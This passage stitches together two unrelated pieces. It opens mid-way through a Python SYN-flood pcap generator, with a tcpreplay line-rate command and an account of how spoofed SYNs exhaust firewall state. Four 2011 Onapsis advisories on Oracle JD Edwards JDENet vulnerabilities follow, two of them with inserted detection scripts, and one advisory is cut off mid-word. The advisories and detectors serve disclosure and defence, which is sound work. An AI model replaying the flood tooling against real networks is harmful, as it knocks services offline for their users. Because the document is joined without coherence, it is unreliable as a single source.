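    """Walk the pcap back; return (frame_count, all_frames_are_valid_syns)."""
    magic, = struct.unpack("<I", data[:4])
    assert magic == PCAP_MAGIC
    pos, frames, ok = 24, 0, True
    while pos < len(data):
        _, _, incl, _ = struct.unpack("<IIII", data[pos:pos + 16])
        frame = data[pos + 16:pos + 16 + incl]
        ip, tcp = frame[14:34], frame[34:54]
        pseudo = ip[12:16] + ip[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
        # a header with a correct checksum sums to zero over its own bytes
        ok = ok and checksum(ip) == 0 and checksum(pseudo + tcp) == 0
        ok = ok and tcp[13] == 0x02          # flags byte: SYN only
        frames += 1
        pos += 16 + incl
    return frames, ok


if __name__ == "__main__":
    with open("syn_flood.pcap", "wb") as fh:
        fh.write(build_syn_pcap("10.0.0.5", 80, 10000))
```

Replay the file at line rate with `tcpreplay --intf1=eth0 --topspeed syn_flood.pcap` (these are standard tcpreplay options) on a segment that reaches only the appliance under test. Because the source addresses are spoofed, the SYN-ACKs go nowhere, which is precisely the half-open load that exhausts state tables on a stateful firewall or IPS; vary `count` and the inter-frame spacing to find the knee where the device starts dropping legitimate flows.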

[Full-disclosure] [Onapsis Security Advisory 2011-013] Oracle JD Edwards JDENET USRBROADCAST Denial of Service

2011-04-28 Thread Onapsis Research Labs
Onapsis Security Advisory 2011-013: Oracle JD Edwards JDENET USRBROADCAST 
Denial of Service

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well as exclusive access 
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=====================

By exploiting this vulnerability, an unauthenticated attacker would be able to 
remotely disrupt the JD Edwards server.
This would result in the total unavailability of the ERP functionality, 
preventing company users from performing the required business processes.

-- Risk Level:  High


2. Advisory Information
=======================

-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-13

-- Onapsis SVS ID: ONAPSIS-00022

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information
============================

-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98
(older versions might also be affected)

-- Vulnerability Class: Memory corruption

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-13


4. Affected Components Description
==================================

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details
========================

If a specially crafted packet is sent to the JDENet service, an access 
violation is raised. As the process fails to handle this exception, the result 
is a crash that renders the system unavailable.
Further technical details about this issue are not disclosed at this moment, 
in order to give affected customers enough time to patch their systems and 
protect against exploitation of the described vulnerability.


6. Solution
===========

Apply the Oracle Critical Patch Update of April 2011. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==================

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.


About Onapsis Research Labs
===========================

Onapsis is continuously investing resources in the research of the security of 
business critical systems and applications.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved in this 
special team lead the public research trends in this matter, having discovered 
and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality of our 
solutions and enabling our customers to be protected from the latest risks to 
their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of 
information and increasing the common knowledge in this field.


About Onapsis
=============

Onapsis is the leading provider of solutions for the security of ERP and 
business-critical systems and applications. Through different innovative 
products and services, Onapsis helps its global customers to effectively 
increase the security level of their core business platforms, protecting their 
information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the ERP security 
field, with several years of experience in the assessment and protection of 
critical platforms in world-wide customers, such as
Fortune-500 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated 
Security & Compliance Audits, Vulnerability Assessments and Penetration Tests 
over their SAP platform, helping them enforce compliance requirements, decrease 
financial fraud risks and reduce audit costs drastica

[Full-disclosure] [Onapsis Security Advisory 2011-012] Oracle JD Edwards JDENET Firewall Bypass

2011-04-28 Thread Onapsis Research Labs
Onapsis Security Advisory 2011-012: Oracle JD Edwards JDENET Firewall Bypass

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well as exclusive access 
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=====================

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to connect to the ERP system, bypassing weak network firewall 
configurations. This might result in obtaining remote access to the ERP system, 
even though that access was supposed to be restricted to internal networks.

-- Risk Level:  Low


2. Advisory Information
=======================

-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-12

-- Onapsis SVS ID: ONAPSIS-00024

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information
============================

-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98
(older versions might also be affected)

-- Vulnerability Class: Abuse of designed functionality

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-12


4. Affected Components Description
==================================

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details
========================

If a specially crafted UDP packet is sent to the JDENet port, the JDENET 
service opens an outbound TCP connection to the IP address and port supplied 
in that packet. Because the server initiates the connection, an inbound-only 
firewall rule set does not stop it; the callback connection could then be used 
to access JDENET and all ERP functionality exposed through it.

Further technical details about this issue are not disclosed at this moment, 
in order to give affected customers enough time to patch their systems and 
protect against exploitation of the described vulnerability.
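The callback described above leaves a recognisable trace in firewall flow logs: an outbound TCP connection from the ERP server to an untrusted host, shortly after an inbound UDP datagram to the JDENet port from that same host. The following is an added detection example, not part of the Onapsis advisory. The log layout is constructed, and the server address 10.1.1.20, the trusted range 10.0.0.0/8 and the JDENet listening port 6014 are assumptions (the advisory names no port; check the server's jde.ini).

```python
"""Spot JDENET callback connections in key=value firewall flow logs.

Added example, not from the advisory. The log format, the server address,
the internal range and the JDENet port are assumptions; adjust to your site.
"""
import ipaddress
from datetime import datetime, timedelta

JDENET_SERVER = ipaddress.ip_address("10.1.1.20")   # assumed ERP server
JDENET_PORT = 6014                                  # assumed; verify in jde.ini
INTERNAL = [ipaddress.ip_network("10.0.0.0/8")]     # assumed trusted ranges
WINDOW = timedelta(seconds=30)   # how long a UDP trigger stays "recent"

# Constructed sample log: one flow per line, accept-logged by the firewall.
SAMPLE_LOG = """\
2011-04-28T10:00:01 proto=udp src=10.2.3.4 sport=51000 dst=10.1.1.20 dport=6014
2011-04-28T10:00:02 proto=tcp src=10.1.1.20 sport=40001 dst=10.2.3.4 dport=6015
2011-04-28T10:05:10 proto=udp src=198.51.100.7 sport=40000 dst=10.1.1.20 dport=6014
2011-04-28T10:05:11 proto=tcp src=10.1.1.20 sport=40002 dst=198.51.100.7 dport=4444
2011-04-28T10:20:00 proto=tcp src=10.1.1.20 sport=40003 dst=203.0.113.9 dport=443
"""


def parse(line: str) -> dict:
    """Turn one 'ts k=v k=v ...' line into a typed record."""
    ts, *kv = line.split()
    rec = dict(p.split("=", 1) for p in kv)
    rec["ts"] = datetime.fromisoformat(ts)
    rec["src"] = ipaddress.ip_address(rec["src"])
    rec["dst"] = ipaddress.ip_address(rec["dst"])
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec


def is_internal(ip) -> bool:
    return any(ip in net for net in INTERNAL)


def find_callbacks(log_text: str):
    """Return (time, dst, dport, verdict) for every outbound TCP connection the
    ERP server makes to a non-internal host. The verdict is
    'confirmed-callback' when a UDP datagram from that host reached the JDENet
    port within WINDOW beforehand (the trigger the advisory describes), and
    'unexpected-egress' otherwise, since the server should not dial out at all."""
    recent_udp = []   # (ts, src) of datagrams to JDENET_SERVER:JDENET_PORT
    alerts = []
    for line in log_text.splitlines():
        r = parse(line)
        if (r["proto"] == "udp" and r["dst"] == JDENET_SERVER
                and r["dport"] == JDENET_PORT):
            recent_udp.append((r["ts"], r["src"]))
        elif (r["proto"] == "tcp" and r["src"] == JDENET_SERVER
                and not is_internal(r["dst"])):
            # drop triggers older than WINDOW, then look for a matching source
            recent_udp = [(t, s) for t, s in recent_udp if r["ts"] - t <= WINDOW]
            triggered = any(s == r["dst"] for _, s in recent_udp)
            alerts.append((r["ts"].isoformat(), str(r["dst"]), r["dport"],
                           "confirmed-callback" if triggered else "unexpected-egress"))
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(*alert)
```

The second verdict matters as much as the first: an ERP server has no business initiating connections to untrusted networks, so an egress rule that denies outbound TCP from it defeats this callback whether or not the April 2011 CPU has been applied, and the 'unexpected-egress' hits are the audit that tells you whether such a rule exists.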

6. Solution
===========

Apply the Oracle Critical Patch Update of April 2011. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==================

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.


[Full-disclosure] [Onapsis Security Advisory 2011-011] Oracle JD Edwards JDENET Buffer Overflow

2011-04-28 Thread Onapsis Research Labs
Onapsis Security Advisory 2011-011: Oracle JD Edwards JDENET Buffer Overflow

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well as exclusive access 
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=====================

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access or modify all the business information processed by the ERP 
system.
This would result in the total compromise of the ERP infrastructure.

-- Risk Level:  High


2. Advisory Information
=======================

-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-11

-- Onapsis SVS ID: ONAPSIS-00018

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information
============================

-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98
(older versions might also be affected)

-- Vulnerability Class: Memory corruption

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-11


4. Affected Components Description
==================================

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details
========================

If a packet of a specific size is sent to the JDENet service, a heap-based 
buffer overflow condition is triggered.

Further technical details about this issue are not disclosed at this moment, 
in order to give affected customers enough time to patch their systems and 
protect against exploitation of the described vulnerability.


6. Solution
===========

Apply the Oracle Critical Patch Update of April 2011. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==================

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.


[Full-disclosure] [Onapsis Security Advisory 2011-010] Oracle JD Edwards JDENET Remote Logging Deactivation

2011-04-28 Thread Onapsis Research Labs
Onapsis Security Advisory 2011-010: Oracle JD Edwards JDENET Remote Logging 
Deactivation

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well as exclusive access 
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=====================

By exploiting this vulnerability, a remote unauthenticated attacker would be 
able to disable logging capabilities in the JD Edwards server.
This could result in malicious activities becoming untraceable on the ERP 
Server.

-- Risk Level:  Medium


2. Advisory Information
=======================

-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-10

-- Onapsis SVS ID: ONAPSIS-00025

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information
============================

-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98
(older versions might also be affected)

-- Vulnerability Class: Unauthenticated functionality

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-10


4. Affected Components Description
==================================

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details
========================

Several ways to remotely deactivate kernel process logging have been 
identified. If specially crafted messages are sent to the JDENET service, the 
JDENET kernel stops logging the activity of the kernel processes.

Further technical details about this issue are not disclosed at this moment, 
in order to give affected customers enough time to patch their systems and 
protect against exploitation of the described vulnerability.
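An attacker who silences the kernel logs leaves one signal behind: the logs stop. The following is an added example, not part of the Onapsis advisory, of the dead-man's-switch check a SOC would run over the kernel log stream to catch that: it tracks the last entry seen per kernel and raises an alert both for a gap that later resumed and for a kernel that is still silent at evaluation time. The line layout and kernel names are constructed (the real jde*.log format differs, so parse_line() needs adapting), and the five-minute threshold is an assumption to tune against each kernel's normal chatter.

```python
"""Alert when a JD Edwards kernel's log stream goes silent.

Added example, not from the advisory. Log line layout, kernel names and the
MAX_GAP threshold are constructed assumptions; adapt parse_line() and MAX_GAP
to the real jde*.log files and each kernel's normal activity.
"""
from datetime import datetime, timedelta

MAX_GAP = timedelta(minutes=5)   # assumed: longest silence that is still normal

# Constructed sample: two kernels, one of which stops writing after 09:05.
SAMPLE_LOG = """\
2011-04-28T09:00:00 kernel=SECURITY msg=user login ok
2011-04-28T09:01:00 kernel=CALLOBJ msg=request served
2011-04-28T09:02:00 kernel=SECURITY msg=user login ok
2011-04-28T09:03:00 kernel=CALLOBJ msg=request served
2011-04-28T09:04:00 kernel=SECURITY msg=user login ok
2011-04-28T09:05:00 kernel=CALLOBJ msg=request served
2011-04-28T09:20:00 kernel=CALLOBJ msg=request served
"""


def parse_line(line: str):
    """Return (timestamp, kernel name) from 'ts kernel=NAME msg=...'."""
    ts, kernel, _ = line.split(" ", 2)
    return datetime.fromisoformat(ts), kernel.split("=", 1)[1]


def find_silences(log_text: str, now: datetime):
    """Return (kernel, last_seen, resumed_at) tuples.

    resumed_at is the timestamp of the entry that ended a gap longer than
    MAX_GAP, or None when the kernel has written nothing since last_seen and
    `now` is already more than MAX_GAP later (the still-silent case that the
    remote logging deactivation produces)."""
    last = {}
    alerts = []
    for line in log_text.splitlines():
        ts, kernel = parse_line(line)
        if kernel in last and ts - last[kernel] > MAX_GAP:
            alerts.append((kernel, last[kernel].isoformat(), ts.isoformat()))
        last[kernel] = ts
    for kernel, ts in last.items():
        if now - ts > MAX_GAP:
            alerts.append((kernel, ts.isoformat(), None))
    # sort on kernel and last_seen only; the third field may be None
    return sorted(alerts, key=lambda a: a[:2])


if __name__ == "__main__":
    for alert in find_silences(SAMPLE_LOG, datetime(2011, 4, 28, 9, 21)):
        print(*alert)
```

Two caveats a practitioner should build in: a kernel that is genuinely idle overnight looks the same as one whose logging was switched off, so the threshold has to follow a per-kernel baseline rather than one global value; and a silent log is also what a crashed kernel looks like (the denial of service in advisory 2011-013), so pair this check with process liveness monitoring to tell the two apart.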


6. Solution
===========

Apply the Oracle Critical Patch Update of April 2011. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html

Onapsis strongly recommends Oracle customers to download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==================

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.

